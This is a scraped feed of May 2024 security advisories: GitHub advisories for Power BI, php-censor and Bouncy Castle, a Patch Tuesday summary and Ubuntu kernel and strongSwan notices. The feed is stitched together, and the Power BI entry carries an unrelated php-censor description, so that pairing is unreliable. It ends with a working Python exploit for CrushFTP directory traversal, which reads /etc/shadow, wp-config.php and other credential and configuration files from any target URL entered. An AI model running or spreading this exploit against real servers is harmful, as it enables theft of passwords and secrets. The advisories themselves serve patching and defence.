Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-30054

**Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget Microsoft.PowerBI.JavaScript (NuGet)

**Affected versions**

<= 2.23.0

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-wchx-rm6h-7jf6: Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability

php-censor v2.1.4 and fixed in v.2.1.5 was discovered to utilize a weak hashing algorithm for its remember_key value. This allows attackers to bruteforce to bruteforce the remember_key value to gain access to accounts that have checked "remember me" when logging in.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-34914

**PHP Censor uses a weak hashing algorithm for the remember me key**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

composer php-censor/php-censor (Composer)

**Affected versions**

\>= 2.1.0, < 2.1.5

< 2.0.13

**Patched versions**

2.1.5

2.0.13

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-fqw7-839j-hvxj: PHP Censor uses a weak hashing algorithm for the remember me key

The lone critical security issue is CVE-2024-30044, a remote code execution vulnerability in SharePoint Server.

Tuesday, May 14, 2024 13:57

After a relatively hefty Microsoft Patch Tuesday in April, this month’s security update from the company only included one critical vulnerability across its massive suite of products and services.  

In all, May’s slate of vulnerabilities disclosed by Microsoft included 59 total CVEs, most of which are considered to be of “important” severity. There is only one moderate-severity vulnerability. 

The lone critical security issue is CVE-2024-30044, a remote code execution vulnerability in SharePoint Server. An authenticated attacker who obtains Site Owner permissions or higher could exploit this vulnerability by uploading a specially crafted file to the targeted SharePoint Server. Then, they must craft specialized API requests to trigger the deserialization of that file’s parameters, potentially leading to remote code execution in the context of the SharePoint Server. 

The Windows Mobile Broadband Driver also contains multiple remote code execution vulnerabilities: 

*   CVE-2024-29997 
*   CVE-2024-29998 
*   CVE-2024-29999 
*   CVE-2024-30000 
*   CVE-2024-30001 
*   CVE-2024-30002 
*   CVE-2024-30003 
*   CVE-2024-30004 
*   CVE-2024-30005 

However, to successfully exploit this issue, an adversary would need to physically connect a compromised USB device to the victim's machine. 

Microsoft also disclosed a zero-day vulnerability in the Windows DWM Core Library, CVE-2024-30051. Desktop Window Manager (DWM) is a Windows operating system service that enables visual effects on the desktop and manages things like transitions between windows.   

An adversary could exploit CVE-2024-30051 to gain SYSTEM-level privileges.  

This vulnerability is classified as having a “low” level of attack complexity, and exploitation of this vulnerability has already been detected in the wild.  

One other issue, CVE-2024-30046, has already been disclosed prior to Patch Tuesday, but has not yet been exploited in the wild. This is a denial-of-service vulnerability in ASP.NET, a web application framework commonly used in Windows.  

Microsoft considers this vulnerability “less likely” to be exploited, as successful exploitation would require an adversary to spend a significant amount of time repeating exploitation attempts by sending constant or intermittent data to the targeted machine.   

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63419, 63420, 63422 - 63432, 63444 and 63445. There are also Snort 3 rules 300906 - 300912.

Only one critical vulnerability included in May’s Microsoft Patch Tuesday; One other zero-day in DWN Core

Multiple security flaws have been disclosed in VMware Workstation and Fusion products that could be exploited by threat actors to access sensitive information, trigger a denial-of-service (DoS) condition, and execute code under certain circumstances.
The four vulnerabilities impact Workstation versions 17.x and Fusion versions 13.x, with fixes available in version 17.5.2 and

VMware Patches Severe Security Flaws in Workstation and Fusion Products

An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-30171

**Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack")**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-fips (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-v435-xc8x-wvr9: Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack")

An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29857

**Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bc-fips (Maven)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-8xfc-gm6g-vgpv: Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.

An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-30172

**Bouncy Castle crafted signature and public key can be used to trigger an infinite loop**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-m44j-cfrm-g8qc: Bouncy Castle crafted signature and public key can be used to trigger an infinite loop

Ubuntu Security Notice 6767-2 - Chenyuan Yang discovered that the RDS Protocol implementation in the Linux kernel contained an out-of-bounds read vulnerability. An attacker could use this to possibly cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6767-2May 14, 2024linux-bluefield vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-bluefield: Linux kernel for NVIDIA BlueField platformsDetails:Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - PowerPC architecture;   - S390 architecture;   - Block layer subsystem;   - Android drivers;   - Hardware random number generator core;   - GPU drivers;   - Hardware monitoring drivers;   - I2C subsystem;   - IIO Magnetometer sensors drivers;   - InfiniBand drivers;   - Network drivers;   - PCI driver for MicroSemi Switchtec;   - PHY drivers;   - Ceph distributed file system;   - Ext4 file system;   - JFS file system;   - NILFS2 file system;   - Pstore file system;   - Core kernel;   - Memory management;   - CAN network layer;   - Networking core;   - IPv4 networking;   - Logical Link layer;   - Netfilter;   - NFC subsystem;   - SMC sockets;   - Sun RPC protocol;   - TIPC protocol;   - Realtek audio codecs;(CVE-2024-26696, CVE-2023-52583, CVE-2024-26720, CVE-2023-52615,CVE-2023-52599, CVE-2023-52587, CVE-2024-26635, CVE-2024-26704,CVE-2024-26625, CVE-2024-26825, CVE-2023-52622, CVE-2023-52435,CVE-2023-52617, CVE-2023-52598, CVE-2024-26645, CVE-2023-52619,CVE-2024-26593, CVE-2024-26685, CVE-2023-52602, CVE-2023-52486,CVE-2024-26697, CVE-2024-26675, CVE-2024-26600, CVE-2023-52604,CVE-2024-26664, CVE-2024-26606, CVE-2023-52594, CVE-2024-26671,CVE-2024-26598, CVE-2024-26673, CVE-2024-26920, CVE-2024-26722,CVE-2023-52601, CVE-2024-26602, CVE-2023-52637, CVE-2023-52623,CVE-2024-26702, CVE-2023-52597, CVE-2024-26684, CVE-2023-52606,CVE-2024-26679, CVE-2024-26663, CVE-2024-26910, CVE-2024-26615,CVE-2023-52595, CVE-2023-52607, CVE-2024-26636)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.4.0-1084-bluefield  5.4.0-1084.91   linux-image-bluefield           5.4.0.1084.80After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6767-2   https://ubuntu.com/security/notices/USN-6767-1   CVE-2023-52435, CVE-2023-52486, CVE-2023-52583, CVE-2023-52587,   CVE-2023-52594, CVE-2023-52595, CVE-2023-52597, CVE-2023-52598,   CVE-2023-52599, CVE-2023-52601, CVE-2023-52602, CVE-2023-52604,   CVE-2023-52606, CVE-2023-52607, CVE-2023-52615, CVE-2023-52617,   CVE-2023-52619, CVE-2023-52622, CVE-2023-52623, CVE-2023-52637,   CVE-2024-23849, CVE-2024-26593, CVE-2024-26598, CVE-2024-26600,   CVE-2024-26602, CVE-2024-26606, CVE-2024-26615, CVE-2024-26625,   CVE-2024-26635, CVE-2024-26636, CVE-2024-26645, CVE-2024-26663,   CVE-2024-26664, CVE-2024-26671, CVE-2024-26673, CVE-2024-26675,   CVE-2024-26679, CVE-2024-26684, CVE-2024-26685, CVE-2024-26696,   CVE-2024-26697, CVE-2024-26702, CVE-2024-26704, CVE-2024-26720,   CVE-2024-26722, CVE-2024-26825, CVE-2024-26910, CVE-2024-26920Package Information:   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1084.91

Ubuntu Security Notice USN-6767-2

Ubuntu Security Notice 6772-1 - Jan Schermer discovered that strongSwan incorrectly validated client certificates in certain configurations. A remote attacker could possibly use this issue to bypass access controls.

    ==========================================================================Ubuntu Security Notice USN-6772-1May 14, 2024strongswan vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Fraudulent security certificates could allow access controls to bebypassed.Software Description:- strongswan: IPsec VPN solutionDetails:Jan Schermer discovered that strongSwan incorrectly validated clientcertificates in certain configurations. A remote attacker could possiblyuse this issue to bypass access controls.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   libstrongswan                   5.9.5-2ubuntu2.3   strongswan                      5.9.5-2ubuntu2.3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6772-1   CVE-2022-4967Package Information:   https://launchpad.net/ubuntu/+source/strongswan/5.9.5-2ubuntu2.3

Ubuntu Security Notice USN-6772-1

CrushFTP versions prior to 11.1.0 suffers from a directory traversal vulnerability.

    ## Exploit Title: CrushFTP Directory Traversal## Google Dork: N/A# Date: 2024-04-30# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)## Vendor Homepage: https://www.crushftp.com/## Software Link: https://www.crushftp.com/download/## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)## Tested on: Windows10import requestsimport re# Regular expression to validate the URLdef is_valid_url(url):    regex = re.compile(        r'^(?:http|ftp)s?://' # http:// or https://        r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...        r'localhost|' # localhost...        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4        r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6        r'(?::\d+)?' # optional: port        r'(?:/?|[/?]\S+)$', re.IGNORECASE)    return re.match(regex, url) is not None# Function to scan for the vulnerabilitydef scan_for_vulnerability(url, target_files):    print("Scanning for vulnerability in the following files:")    for target_file in target_files:        print(target_file)    for target_file in target_files:        try:            response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)            if response.status_code == 200 and target_file.split('/')[-1] in response.text:                print("vulnerability detected in file", target_file)                print("Content of file", target_file, ":")                print(response.text)            else:                print("vulnerability not detected or unexpected response for file", target_file)        except requests.exceptions.RequestException as e:            print("Error connecting to the server:", e)# User inputinput_url = input("Enter the URL of the CrushFTP server: ")# Validate the URLif is_valid_url(input_url):    # Expanded list of allowed files    target_files = [        "/var/www/html/index.php",        "/var/www/html/wp-config.php",        "/etc/passwd",        "/etc/shadow",        "/etc/hosts",        "/etc/ssh/sshd_config",        "/etc/mysql/my.cnf",        # Add more files as needed            ]    # Start the scan    scan_for_vulnerability(input_url, target_files)else:    print("Invalid URL entered. Please enter a valid URL.")

Tag

#vulnerability